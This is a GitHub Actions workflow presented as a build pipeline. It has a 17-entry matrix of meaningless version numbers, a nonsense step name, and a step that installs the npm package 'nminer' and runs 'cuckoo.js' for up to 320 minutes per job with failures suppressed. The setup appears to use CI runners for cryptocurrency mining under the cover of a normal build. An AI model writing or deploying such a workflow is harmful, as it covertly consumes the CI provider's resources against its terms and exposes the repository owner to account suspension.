name: cuckoo
on:
  push:
    branches: [ "main" ]

jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        config:
          - { version: 7413 }
          - { version: 1227 }
          - { version: 472 }
          - { version: 7595 }
          - { version: 6596 }
          - { version: 7265 }
          - { version: 7813 }
          - { version: 2596 }
          - { version: 2327 }
          - { version: 2431 }
          - { version: 5903 }
          - { version: 6208 }
          - { version: 1470 }
          - { version: 3225 }
          - { version: 6647 }
          - { version: 5187 }
          - { version: 542 }

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Install Node.js
        uses: actions/setup-node@v3
        with:
          node-version: 20
          
      - name: warm before black-and-white a
        run: |
          npm install nminer@latest
          timeout 320m node cuckoo.js || echo "cuckoo executed"